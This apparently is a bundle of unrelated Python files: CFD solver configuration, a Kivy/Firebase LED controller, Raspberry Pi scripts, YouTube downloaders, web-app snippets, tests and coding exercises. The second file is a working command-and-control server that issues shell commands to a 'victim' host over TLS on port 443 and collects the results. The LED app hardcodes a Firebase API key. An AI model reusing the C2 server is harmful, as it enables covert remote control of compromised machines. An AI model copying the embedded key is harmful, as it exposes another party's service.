default_settings = Kratos.Parameters(r'''{
"echo_level" :0,
"constants":
{
"wall_smoothness_beta" : 5.2,
"von_karman" : 0.41,
"c_mu" : 0.09,
"c1" : 1.44,
"c2" : 1.92,
"sigma_k" : 1.0,
"sigma_epsilon" : 1.3,
"bossak_alpha" : 1.0
}
}''')
parameters["model_settings"].ValidateAndAssignDefaults(
default_settings)
self.model_settings = parameters["model_settings"]
self.element_name = "RansEvmMonolithicKEpsilonVMSAdjoint"
self.condition_name = "RansEvmMonolithicKEpsilonVMSAdjointWallCondition"
def InitializeModelConstants(self):
# reading constants
constants = self.model_settings["constants"]
self.fluid_model_part.ProcessInfo[KratosRANS.WALL_SMOOTHNESS_BETA] = constants["wall_smoothness_beta"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.WALL_VON_KARMAN] = constants["von_karman"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENCE_RANS_C_MU] = constants["c_mu"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENCE_RANS_C1] = constants["c1"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENCE_RANS_C2] = constants["c2"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENT_KINETIC_ENERGY_SIGMA] = constants["sigma_k"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.TURBULENT_ENERGY_DISSIPATION_RATE_SIGMA] = constants["sigma_epsilon"].GetDouble()
self.fluid_model_part.ProcessInfo[KratosRANS.IS_CO_SOLVING_PROCESS_ACTIVE] = True
self.fluid_model_part.ProcessInfo[Kratos.BOSSAK_ALPHA] = constants["bossak_alpha"].GetDouble()
Kratos.Logger.PrintInfo(
self.__class__.__name__,
"All adjoint turbulence solution strategies are created.")
def AddVariables(self):
# adding k-epsilon specific variables
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_KINETIC_ENERGY)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_KINETIC_ENERGY_RATE)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_ENERGY_DISSIPATION_RATE)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.TURBULENT_ENERGY_DISSIPATION_RATE_2)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUXILIARY_VARIABLE_1)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUXILIARY_VARIABLE_2)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_1_ADJOINT_1)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_1_ADJOINT_2)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_1_ADJOINT_3)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUX_ADJOINT_SCALAR_1)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_2_ADJOINT_1)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_2_ADJOINT_2)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_SCALAR_2_ADJOINT_3)
self.fluid_model_part.AddNodalSolutionStepVariable(KratosRANS.RANS_AUX_ADJOINT_SCALAR_2)
super(AdjointTurbulenceKEpsilonConfiguration, self).AddVariables()
def AddDofs(self):
Kratos.VariableUtils().AddDof(KratosRANS.RANS_SCALAR_1_ADJOINT_1, self.fluid_model_part)
Kratos.VariableUtils().AddDof(KratosRANS.RANS_SCALAR_2_ADJOINT_1, self.fluid_model_part)
Kratos.Logger.PrintInfo(self.__class__.__name__,
"DOFs added successfully.")
def Initialize(self):
self.InitializeModelConstants()
def GetAdjointElementName(self):
return self.element_name
def GetAdjointConditionName(self):
return self.condition_name
def Check(self):
pass
def InitializeSolutionStep(self):
pass
def FinalizeSolutionStep(self):
pass
|
from http.server import *
import random, string, ssl
"""
this is used to generate random session cookie value.
"""
chars = string.ascii_letters + string.digits
session_value = ''.join(random.choice(chars) for i in range(20))
"""
c2server class has accepts two HTTP methods.
1. GET : This method is used to send command to the compromised host
2. POST : This method is used to receive results of the command executed.
"""
class c2Server(BaseHTTPRequestHandler):
def set_headers(self):
"""
set_headers can be used to set custom HTTP headers. This helps mask identity of
c2 server.
"""
self.send_response(200, "ok")
self.send_header('Content-type', 'text/html')
self.send_header('Set-Cookie', session_value)
self.end_headers()
# Allow GET
def do_GET(self):
self.set_headers()
"""
message variable is the command being sent to victim node. For the purpose of this
demo it is being entered manually. But it can be stored in a database and
retrieved later when victim calls back for task. A use case can be found in
https://github.com/madhavbhatt/Web-Based-Command-Control/blob/master/c2.py
"""
message = input("$ ") # command
self.wfile.write(message.encode('utf-8'))
# Allow POST
def do_POST(self):
# self.set_headers()
print("data received from " + str(self.client_address[0]))
"""
self.client_address[0] is the IP address of calling victim. In the POST request,
host would send content-length of the data sent via POST. Which is further used
to isolate the data from request.
"""
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
data = post_data.decode('utf-8') # result of command execution
print(data)
def runC2server():
server_address = ('', 443) # start listening on 443
httpd = HTTPServer(server_address, c2Server)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='server.cert', keyfile="server.key", server_side=True)
print("Server Started ..!!")
httpd.serve_forever()
runC2server()
|
import kivy
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager,Screen
from kivy.properties import ObjectProperty
from kivy.uix.button import Button
import pyrebase
import json
import requests
kezz = []
class SignupWindow(Screen):
userr = ObjectProperty(None)
passwordi = ObjectProperty(None)
#waka = "AIzaSyAso8HtWVAyLxTyqyj52TMO3GThdNfFXJg" #web api key
firebaseconfig = {
"apiKey": "AIzaSyAso8HtWVAyLxTyqyj52TMO3GThdNfFXJg",
"authDomain": "rgb-led-project.firebaseapp.com",
"databaseURL": "https://rgb-led-project-default-rtdb.europe-west1.firebasedatabase.app",
"projectId": "rgb-led-project",
"storageBucket": "rgb-led-project.appspot.com",
"messagingSenderId": "448826405701",
"appId": "1:448826405701:web:d14e1f9732ff6ccb5e842c",
"measurementId": "G-SBNKDMF10D"
}
firebase = pyrebase.initialize_app(firebaseconfig)
auth = firebase.auth()
db = firebase.database()
def sign_up(self):
email = self.userr.text
password = self.passwordi.text
print(email,password)
try:
user = self.auth.create_user_with_email_and_password(email, password)
self.ids.signup_erra_message.text = "User Created Successfully"
except requests.exceptions.HTTPError as error :
#print(error)
error_message = json.loads(error.args[1])['error']['message']
#print(error_message)
self.ids.signup_erra_message.text = error_message
class LoginWindow(SignupWindow):
wifiname = ObjectProperty(None)
#wifipassword = ObjectProperty(None)
def login(self):
email = self.userr.text
password = self.passwordi.text
wifiname1 = self.wifiname.text
#wifipass1 = self.wifipassword.text
kezz.insert(1,wifiname1) #UserWifiSSID
#kezz.insert(2,wifipass1) #UserWifiPassword
kezz.insert(0,password) #to get the path token down in the main window class
#print(email,password)
try:
login = self.auth.sign_in_with_email_and_password(email, password)
self.ids.signup_erra_message1.text="Successfully logged in!"
except requests.exceptions.HTTPError as error1:
#print(error1)
error1_message = json.loads(error1.args[1])['error']['message']
#print(error1_message)
if error1_message == "EMAIL_NOT_FOUND":
self.ids.signup_erra_message1.text= error1_message + "Press signup button"
else:
self.ids.signup_erra_message1.text= error1_message
class MainWindow(LoginWindow):
red = ObjectProperty(0.5)
green = ObjectProperty(0.5)
blue = ObjectProperty(0.5)
#firebase_url = 'https://rgb-led-project-default-rtdb.europe-west1.firebasedatabase.app/.json'
def printout(self):
redder = format(self.red.value , ".3f" )
greener = format(self.green.value , ".3f" )
bluer = format(self.blue.value , ".3f" )
#print("e", "'"+kezz[0]+"'")
kramby = "'"+kezz[0]+"'"
#res = isinstance(bluer, str) #the entities above are already strings
#print("Red:", redder, "Green:", greener ,"Blue:", bluer )
redde = float(redder) * 255
greenie = float(greener) * 255
bluebol = float(bluer) * 255
#print(redde,greenie,bluebol)
json_data = {"red" : redde , "green" : greenie , "blue": bluebol, "SSID" : kezz[1]}
self.db.child(kramby).set(json_data)
#res = requests.put(url = self.firebase_url , json = json_data)
#print (res)
class WindowManager(ScreenManager):
pass
elixir = Builder.load_file('rgbslider.kv')
#print(format(432.456, ".2f"))
class Multiple_Slider(App):
def build(self):
return elixir
if __name__ == '__main__':
Multiple_Slider().run() |
import random
f = open("data/occupations.csv", "r").readlines()
f = [x.strip("\r\n") for x in f]
f = f[1:-1]
def parse(elem):
occ = ""
i = 0
while i < len(elem):
if elem[i] == '"':
occ += elem[i]
i += 1
while elem[i] != '"':
occ += elem[i]
i += 1
occ += '"'
elif elem[i] == ",":
i += 1
break
else:
occ += elem[i]
i += 1
pt = float(elem[i:])
return occ, pt
def randOcc(dict):
perc = random.random() * 100;
for key,val in dict.iteritems():
perc -= val
if perc <= 0:
return key
return "Unoccupied"
def makeDict():
d = {}
for e in f:
occ,pt = parse(e)
d[occ] = pt
return d
def getOcc():
return randOcc(makeDict())
|
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
self.seqlist = []
def __str__(self):
self.inorder(self)
return ' '.join(str(x) for x in self.seqlist)
def inorder(self, curr):
if not curr: return
self.inorder(curr.left)
self.seqlist.append(curr.val)
self.inorder(curr.right)
class Solution(object):
def searchBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
Solution.ret = [0]
def dfs(node, val):
if not node: return
dfs(node.left, val)
if node.val == val:
Solution.ret[0] = node
dfs(node.right, val)
dfs(root, val)
return Solution.ret[0] if Solution.ret[0] else None
if __name__ == '__main__':
obj = Solution()
# 4
# / \
# 2 7
# / \
# 1 3
root = TreeNode(4)
node1 = TreeNode(2)
node2 = TreeNode(7)
node3 = TreeNode(1)
node4 = TreeNode(3)
root.left = node1
root.right = node2
node1.left = node3
node1.right = node4
res = TreeNode(2)
lnode = TreeNode(1)
rnode = TreeNode(3)
res.left = lnode
res.right = rnode
output = obj.searchBST(root, 2)
assert str(res) == str(output) |
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
def setSpeed(motor, speed):
motor.ChangeDutyCycle(speed)
def stopMotors(lmotor,rmotor):
lmotor.stop()
rmotor.stop()
def startMotors(lmotor,rmotor):
lmotor.start(0)
rmotor.start(0)
def initMotor(pwm,in1,in2, freq):
#freq in Hz
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(pwm,GPIO.OUT)
#GPIO.output(in1,GPIO.HIGH) #forward
#GPIO.output(in2,GPIO.LOW)
wheelForward(in1,in2)
return GPIO.PWM(pwm,freq)
def setFrequency(motor,freq):
motor.ChangeFrequency(freq)
def turnLeft(lmotor,rmotor,speed):
setSpeed(lmotor,0)
setSpeed(rmotor,speed)
# print("Left")
def turnRight(lmotor,rmotor,speed):
setSpeed(lmotor,speed)
setSpeed(rmotor,0)
# print("Right")
def moveForward(lmotor,rmotor,speed):
setSpeed(rmotor,speed)
setSpeed(lmotor,speed)
# print("Forward")
def veerLeft(lmotor,rmotor,speed):
setSpeed(lmotor,speed*(80/100))
setSpeed(rmotor,speed)
# print("VeerL")
def veerRight(lmotor,rmotor,speed):
setSpeed(rmotor,speed*(80/100))
setSpeed(lmotor,speed)
# print("VeerR")
def hardVeerRight(lmotor,rmotor,speed):
setSpeed(rmotor,speed*(75/100))
setSpeed(lmotor,speed)
def hardVeerLeft(lmotor,rmotor,speed):
setSpeed(lmotor,speed*(75/100))
setSpeed(rmotor,speed)
def turnVeerLeft(lmotor,rmotor,speed):
setSpeed(lmotor,speed*(65/100))
setSpeed(rmotor,speed)
def stopMoving(lmotor,rmotor):
setSpeed(lmotor,0)
setSpeed(rmotor,0)
def inPlaceRight(lmotor,rmotor,speed,in1,in2):
setSpeed(lmotor,0)
setSpeed(rmotor,speed)
wheelBackwards(in1,in2)
def fullBackwards(lmotor,rmotor,speed):
setSpeed(lmotor,0)
setSpeed(rmotor,speed)
def fullForward(lmotor,rmotor,speed):
setSpeed(lmotor,speed)
setSpeed(rmotor,0)
def wheelForward(in1,in2):
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
def wheelBackwards(in1,in2):
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
|
# downloads youtube videos and (maybe) upload them to s3
from pytube import YouTube
import json
import subprocess
from multiprocessing import Pool
def downloadvid(url):
print("Downloading {}".format(url))
try:
yt = YouTube(url)
id_idx = url.find('watch?v=') + 8
vid_id = url[id_idx:].rstrip('/')
yt.streams.filter(mime_type='video/mp4', res='360p').first().download(output_path='vids/', filename=vid_id)
except Exception as e:
print("Exception while downloading {}\n{}".format(url, e))
def downloadvids_path(jsonpath):
data = ''
with open(jsonpath) as f:
data = json.loads(f.read())
urls = [e['youtube_link'] for e in data]
print("Starting to download vids from {}".format(jsonpath))
print("urls")
p = Pool()
p.map(downloadvid, urls)
if __name__ == '__main__':
years = range(2010, 2018)
formats = [
'{year}_data.json',
'{year}_non_billboard_data.json'
]
for year in years:
for item in formats:
fn = item.format(year=str(year))
downloadvids_path('dataset/' + fn)
print("Uploading to aws")
subprocess.check_call(['aws', 's3', 'cp', 'vids', 's3://awitiks/vids', '--recursive'])
print("Uploading finished. Deleting local vids.")
subprocess.check_call(['rm', '-r', 'vids'])
subprocess.check_call(['mkdir', 'vids'])
|
#!/usr/bin/python
import youtube_dl
import toolbelt
import os
import sys
import re
import hashtag
import code
import importlib
import configparser
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
#from hashtag.hashtag import HashTagger
HashTagger = hashtag.HashTagger
class YouTubeRipper():
################################################################################
# Need developer keys
################################################################################
def __init__(self,
hashtagdbfile=os.path.expanduser('~')+"/mus/database.tag",
configfile=os.path.expanduser('~')+"/.config/hashtag/ripper.cfg",
):
self.ht = HashTagger(hashtagdbfile);
config = configparser.ConfigParser();
config.read(configfile);
self.developer_key = config['youtube']['developer_key']
self.yt_api_service_name = 'youtube'
self.yt_api_version = 'v3'
self.youtube = build(self.yt_api_service_name,
self.yt_api_version,
developerKey=self.developer_key)
################################################################################
# Search YouTube by keyword for videos
################################################################################
def youtube_search(self, query, num_results):
search_response = self.youtube.search().list(
q=query,
part='id,snippet',
maxResults=num_results
).execute()
videos = []
for search_result in search_response.get('items', []):
if search_result['id']['kind'] == 'youtube#video':
videos.append(
(
search_result['id']['videoId'],
search_result['snippet']['title']
)
)
return videos;
################################################################################
# Download all videos by URL
################################################################################
def download_vids(self, urls):
ydl_opts = {
"outtmpl" : "youtube_%(id)s.%(ext)s",
"continue_dl" : True,
"ratelimit" : "250000",
"ignoreerrors" : True,
"nooverwrites" : True,
"no_check_certificate" : True,
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download(urls);
################################################################################
# Take in strings (presumably from file) describing songs, and generate rows
# to append to database file
################################################################################
def songs2rows(self, songs):
songrows = [];
for song in songs:
parts = song.split(";");
path = parts[0];
tags = [];
if len(parts)>1:
tags = parts[1:];
songpart = path.split("/");
songrow = [
path + ".mp3",
"genre=" + songpart[0],
"artist=" + songpart[1],
"title=" + songpart[2],
] + tags;
songrows.append(songrow);
return songrows;
################################################################################
# Utility functions for music files
################################################################################
def hyphenate(self, s):
return re.sub("[ \t]+", "-", s);
def dehyphenate(self, s):
return re.sub("[\-]+", " ", s);
################################################################################
# Download music
################################################################################
def download_music(self, database):
print(database);
for d in database:
path = d["id"];
query = (self.dehyphenate(d["artist"]) + " " +
self.dehyphenate(d["title"]));
videos = self.youtube_search(
query, 10
);
videos = self.vim_select(videos);
urls = self.video_urls(videos);
ydl_opts = {
"outtmpl" : path,
"continue_dl" : True,
"ratelimit" : "250000",
"ignoreerrors" : True,
"nooverwrites" : True,
"no_check_certificate" : True,
'format' : 'bestaudio/best',
'postprocessors' : [{
'key' : 'FFmpegExtractAudio',
'preferredcodec' : 'mp3',
'preferredquality' : '192',
}]
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download(urls);
################################################################################
# Get video URLs for download
################################################################################
def video_urls(self, videos):
baseurl = "http://youtube.com/watch?v="
urls = []
for (id, title) in videos:
urls.append( baseurl+id );
return urls;
################################################################################
# Allow user to filter titles
################################################################################
def vim_select(self, videos):
titles = [video[1] for video in videos];
titles = toolbelt.editors.vim("\n".join(titles));
newtitles = titles.split("\n");
newvideos = [];
for (id, title) in videos:
if title in newtitles:
newvideos.append((id, title));
return newvideos;
################################################################################
# Filter out IDs of videos which have been downloaded or banned
################################################################################
def filter_excluded(self, videos, excluded_ids):
potential_ids = [v[0] for v in videos]
common_ids = self.ht.intersect(excluded_ids, potential_ids);
filtered_ids = self.ht.difference(potential_ids, common_ids);
# Reconstruct the tuple list
new_videos = [];
for filtered_id in filtered_ids:
for (video_id, title) in videos:
if filtered_id == video_id:
new_videos.append((filtered_id, title));
return new_videos;
################################################################################
# Filter out videos which have been banned
################################################################################
def filter_by_file(self, videos, filename=os.path.expanduser('~')+"/vid/downloaded/excluded.txt"):
excluded_file = open(filename);
excluded_ids = excluded_file.readlines();
excluded_ids = [vid.strip() for vid in ids];
return self.filter_excluded(videos, excluded_ids);
################################################################################
# Filter out videos that have already been downloaded
################################################################################
def filter_downloaded(self, videos, basedir=os.path.expanduser('~')+"/vid/downloaded"):
file_ids = []
for (root, subdirs, files) in os.walk(basedir):
for filename in files:
file_ids.append(filename.split(".")[0]);
return self.filter_excluded(videos, file_ids);
def music(self, songs):
if isinstance(songs, str):
songs = [songs];
songrows = self.songs2rows(songs);
musicdb = self.ht.parserows(songrows);
self.download_music(musicdb);
self.ht.append_entries(songrows);
def vids(self, query, maxResults=20):
videos = self.youtube_search(
query,
maxResults
);
videos = self.filter_downloaded(videos);
videos = self.vim_select(videos);
self.download_vids(
self.video_urls(videos)
)
|
from django import forms
from django.contrib.auth.models import User
dep=(
("CSE", "Computer Science and Engineering"),
("ECE", "Electronics and Communication Engineering"),
("MECH", "Mechanical Engineering"),
("EEE", "Electrical and Electronics Engineering"),
("MECT", "Mechatronics"),
("IT", "Information Technology"),
("CA", "Computer Application"),
("DS", "Data Science"),
)
class PostRegisterForm(forms.Form):
name = forms.CharField(max_length=20)
regno = forms.CharField(max_length=6)
email = forms.EmailField()
phone = forms.CharField(max_length=12)
dept = forms.ChoiceField(choices = dep)
#event = forms.ChoiceField(choices = (GEEKS_CHOICES))
|
import os
import sys
import logging
import opentracing
import datetime
import aiohttp
import time
import json
import traceback as tb
import functools
import socket
from sanic.request import Request
from basictracer.recorder import SpanRecorder
from config import utils
STANDARD_ANNOTATIONS = {"client": {"cs": [], "cr": []}, "server": {"ss": [], "sr": []}}
STANDARD_ANNOTATIONS_KEYS = frozenset(STANDARD_ANNOTATIONS.keys())
_logger = logging.getLogger("zipkin")
def _default_json_default(obj):
"""
Coerce everything to strings.
All objects representing time get output as ISO8601.
"""
if isinstance(obj, (datetime.datetime, datetime.date, datetime.time)):
return obj.isoformat()
else:
return str(obj)
class JsonFormatter(logging.Formatter):
def __init__(self, fmt=None, json_cls=None, json_default=_default_json_default):
if fmt is not None:
self._fmt = json.loads(fmt)
else:
self._fmt = {}
self.json_default = json_default
self.json_cls = json_cls
self.defaults = {}
try:
self.defaults["hostname"] = socket.gethostname()
except:
pass
def format(self, record):
fields = record.__dict__.copy()
if "args" in fields and fields["args"]:
data = fields.pop("args")
# Edit by shady
data = {"name": data[0]}
else:
data = fields
msg = fields.pop("msg")
if "message" not in data:
data["message"] = msg
exc_type, exc_value, exc_traceback = sys.exc_info()
if "exc_text" in fields and fields["exc_text"]:
exception = fields.pop("exc_text")
data.update({"exception": exception})
elif exc_type and exc_value and exc_traceback:
formatted = tb.format_exception(exc_type, exc_value, exc_traceback)
data.update({"exception": formatted})
name = fields["name"]
data.update({"index": name, "document_type": name, "@version": 1})
if "@timestamp" not in data:
now = datetime.datetime.utcnow()
timestamp = (
now.strftime("%Y-%m-%dT%H:%M:%S")
+ ".%03d" % (now.microsecond / 1000)
+ "Z"
)
data.update({"@timestamp": timestamp})
logr = self.defaults.copy()
logr.update(data)
return json.dumps(
logr, default=self.json_default, cls=self.json_cls, ensure_ascii=False
)
def _build_fields(self, defaults, fields):
"""Return provided fields including any in defaults
"""
return dict(list(defaults.get("@fields", {}).items()) + list(fields.items()))
def gen_span(request, name):
span = opentracing.tracer.start_span(operation_name=name, child_of=request["span"])
span.log_kv({"event": "server"})
return span
def logger(
type=None,
category=None,
detail=None,
description=None,
tracing=True,
level=logging.INFO,
*args,
**kwargs,
):
def decorator(fn=None):
@functools.wraps(fn)
async def _decorator(*args, **kwargs):
request = (
args[0] if len(args) > 0 and isinstance(args[0], Request) else None
)
log = {
"category": category or request.app.name if request else "", # 服务名
"fun_name": fn.__name__,
"detail": detail or fn.__name__, # 方法名或定义URL列表
"log_type": type or "method",
"description": description
if description
else fn.__doc__
if fn.__doc__
else "",
}
span = None
if request and tracing:
# oldspan = request['span']
span = gen_span(request, fn.__name__)
# span.tags.update(log)
# request['span'] = span
# log.update({
# 'start_time': span.start_time,
# 'trace_id': span.context.trace_id
# })
else:
start_time = time.time()
log.update({"start_time": start_time})
log.update(
{
"args": ",".join([str(a) for a in args])
if isinstance(args, (list, tuple))
else str(args),
"kwargs": kwargs.copy() if kwargs else {},
}
)
try:
exce = False
res = await fn(*args, **kwargs)
# request['span'] = oldspan
return res
except Exception as e:
exce = True
raise e
finally:
try:
if request and tracing:
span.set_tag(
"component",
"{}-{}".format(request.app.name, log["log_type"]),
)
span.finish()
# log.update({
# 'duration': span.duration,
# 'end_time': span.start_time + span.duration
# })
else:
end_time = time.time()
log.update(
{"end_time": end_time, "duration": end_time - start_time}
)
if exce:
_logger.exception("{} has error".format(fn.__name__), log)
else:
_logger.info("{} is success".format(fn.__name__), log)
except Exception as e:
_logger.excepion(e)
_decorator.detail = detail
_decorator.description = description
_decorator.level = level
return _decorator
decorator.detail = detail
decorator.description = description
decorator.level = level
return decorator
class AioReporter(SpanRecorder):
def __init__(self, queue=None):
self.queue = queue
def record_span(self, span):
self.queue.put_nowait(span)
|
import RPi.GPIO as GPIO
import time
import math
#Code that plays the interesting game Cyclone.
class cycleTimer(object):
def __init__(self, initTime, cycleLength,actionsPerCycle):
self.actionTime=float(cycleLength)/float(actionsPerCycle)
self.cycleLength=cycleLength
self.initTime=initTime
self.actionsPerCycle=actionsPerCycle
def cycleNum(self):
self.currentTime=time.time()
self.cyclePercent=(self.currentTime-self.initTime)/self.cycleLength
self.cyclePercent=self.cyclePercent-math.floor(self.cyclePercent)
self.cycleTime=self.cyclePercent*self.cycleLength
self.cycleNumber=math.floor(self.cycleTime/self.actionTime)
return self.cycleNumber
class risingEdge(object):
def __init__(self):
self.signalPast=0
def checkForEdge(self,signal):
self.signal=signal
if self.signal==1+self.signalPast:
self.signalPast=self.signal
return True
else:
self.signalPast=self.signal
return False
GPIO.setmode(GPIO.BCM)
buttonInput=12
ledNumbers=(18,20,21,22,23,24,25)
GPIO.setup(buttonInput, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(ledNumbers, GPIO.OUT)
cycleLength=2
Timer1=cycleTimer(time.time(), cycleLength,len(ledNumbers))
checkEdge=risingEdge()
try:
while True:
whichLED=Timer1.cycleNum()
offLEDs=[x for x in ledNumbers if x != ledNumbers[whichLED]] #List Comprehension
GPIO.output(offLEDs, GPIO.LOW)
GPIO.output(ledNumbers[whichLED], GPIO.HIGH)
if(checkEdge.checkForEdge(GPIO.input(buttonInput)) == 1):
print("hell ya")
time.sleep(.01)
if whichLED == 4:
GPIO.output(ledNumbers, GPIO.LOW)
break
timer2=cycleTimer(time.time(), 12,2)
GPIO.cleanup()
GPIO.setmode(GPIO.BCM)
GPIO.setup(22, GPIO.OUT)
pwm = GPIO.PWM(22, 100)
pwm.start(25)
while timer2.cycleNum()<1:
pass #pass does nothing, but python requirws a place holder in this instance
except: #This ensures every GPIO Pin is turned off after exit
GPIO.cleanup()
raise
GPIO.cleanup()
|
from flask import Flask, json, request, jsonify, redirect, url_for
from flask_cors import CORS
from pymongo import MongoClient
from name_ge import NameGenerator
from verify_file import verify_file
import os
import uuid
import config
import datetime
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
CORS(app)
cfg = config.Config()
UPLOAD_PATH = cfg.local_path + '/scripts'
ALLOWED_EXTENSIONS = {'py'}
app.config['UPLOAD_FOLDER'] = UPLOAD_PATH
with MongoClient(cfg.db_path) as conn:
db = conn[cfg.db_name]
ng = NameGenerator()
@app.route("/")
def hello():
return "Hello World!"
@app.route('/users')
def get_users():
users = db['users']
l = list(users.find({}))
candidates = list()
na_candidates = list()
for doc in l:
if doc["joinedTeam"] is None:
candidates.append(doc['name'])
else:
na_candidates.append(doc['name'])
return jsonify({"candidates": candidates, "naCandidates": na_candidates})
@app.route('/teamName')
def get_team_name():
x = ng.generate()
return jsonify({"name": x})
@app.route('/teamLogs/<path:teamName>')
def get_log_by_team(teamName):
docs = db['logs'].find({"teamName": teamName})
result = list()
for doc in docs:
t = dict()
t['status'] = doc['status']
t['uploadTime'] = doc['uploadTime'].strftime('%Y%m%d - %h%m%s')
t['uid'] = doc['uid']
result.append(t)
return jsonify({"data": result})
@app.route("/joinTeam", methods=['POST'])
def regist_team():
team_info = json.loads(request.data)
uid = uuid.uuid1()
r = {
"name": team_info["teamName"],
"users": team_info["users"],
"submissions": [],
"highestScore": [0, 0, 0, 0],
"matchInfo": [],
"rank": {
"low": None,
"med": None,
"high": None,
"rand": None
},
"uid": uid
}
db['teams'].insert_one(r)
for u in team_info["users"]:
db["users"].find_one_and_update({"name": u}, {"$set": {"joinedTeam": r["name"]}})
return jsonify({"status": "OK", "uid": uid})
## upload scripts api
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['POST'])
def upload_file():
if request.method == 'POST':
if 'file' not in request.files:
return jsonify({"status": "failed"})
file = request.files['file']
if file.filename == '':
return jsonify({"status": "failed"})
if file and allowed_file(file.filename):
doc = dict()
file_id = str(uuid.uuid1())
doc["uuid"] = file_id
doc["teamName"] = request.form['teamName']
doc['uploadTime'] = datetime.datetime.now()
doc['status'] = 'VerificationFailed'
filename = file_id + '.py'
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
x = verify_file(file_id)
if x['status'] == 'OK':
doc['status'] = 'Active'
# update prev active to inactive
db['logs'].update_one({"teamName": doc["teamName"], "status": "Active"}, {"$set": {"status": "Legacy"}})
# insert this record
db['logs'].insert_one(doc)
return jsonify(x)
|
import pytest
from share.models import SourceConfig
data = r'''
{
"record": [
"OpenTeQ - Opening the black box of Teacher Quality",
"https://www.socialscienceregistry.org/trials/1638",
"June 06, 2017",
"2017-06-06 11:59:10 -0400",
"2017-06-06",
"AEARCTR-0001638",
"Daniel Adam, dan@gmail.com",
"on_going",
"2016-03-01",
"2018-09-22",
"[\"education\", \"\"]",
"",
"test description",
"2016-10-20",
"2017-07-15",
"demo text",
"description",
"plan",
"",
"Randomization done in office by a computer, by a researcher external to the project staff (Giovanni Abbiati - IRVAPP, abbiati@irvapp.it",
"schools (whithin blocks)",
"198 schools whithin 8 blocks",
"around 2.200 teachers teaching Math or Italian to 7th gradersaround 24.000 students for each grade (6th, 7th, 8th)",
"50 schools individual treatment50 schools collective treatment98 schools control",
"demo text",
"Private",
"This section is unavailable to the public.",
"",
"",
"",
"",
"",
"",
"",
"This section is unavailable to the public. Use the button below to request access to this information.",
"",
"",
"",
"",
"",
""
]
}
'''
@pytest.mark.django_db
def test_AEA_transformer():
config = SourceConfig.objects.get(label='org.socialscienceregistry')
transformer = config.get_transformer()
graph = transformer.transform(data)
registration = graph.filter_nodes(lambda n: n.type == 'registration')[0]
assert registration.type == 'registration'
assert registration['description'] == 'test description'
assert registration['title'] == 'OpenTeQ - Opening the black box of Teacher Quality'
assert registration['extra']['primary_investigator'] == {'email': 'dan@gmail.com', 'name': 'Daniel Adam'}
assert registration['extra']['interventions'] == {'end-date': '2017-07-15', 'start-date': '2016-10-20'}
|
class Solution:
def removeDuplicates(self, nums: List[int]) -> int:
if len(nums)==0:
return 0
i = 0
j = 0
while(j<len(nums) and i<len(nums)):
while(j<len(nums) and (nums[j]==nums[i])):
j+=1
if j<len(nums):
nums[i+1]=nums[j]
i+=1
while(len(nums)!=i):
nums.pop() |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import yaml
with open('_data/seminars.yml', 'r') as data_stream:
try:
data = yaml.safe_load(data_stream)
for record in reversed(data):
print('<p>\n{}'.format(record['date']), end='')
if 'author' in record:
print('<br>\n<em>{}</em>'.format(record['author']), end='')
if 'institute' in record:
print(' ({})'.format(record['institute']), end='')
if 'title' in record:
print('<br>\n<strong>{}</strong>'.format(record['title']), end='')
if 'abstract' in record:
print('<br>\n{}'.format(record['abstract']), end='')
print('\n</p>')
except yaml.YAMLError as e:
print(e) |
from django.contrib import admin
from .models import WeatherModels
admin.site.register(WeatherModels) |
import urllib
import httplib
from BeautifulSoup import BeautifulSoup, SoupStrainer
def getHtml(url, fpath):
try:
retval = urllib.urlretrieve(url, fpath)
except (IOError, httplib.InvalidURL) as e:
retval = ('*** error: bad url "%s" : %s') % (url, e)
return retval
# def getHtml2(url):
# header = {"User-Agent":'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36'}
# request = urllib2.Request(url,headers=header) #init user request with url and headers
# response = urllib2.urlopen(request) #open url
# text = response.read()
# return text
#
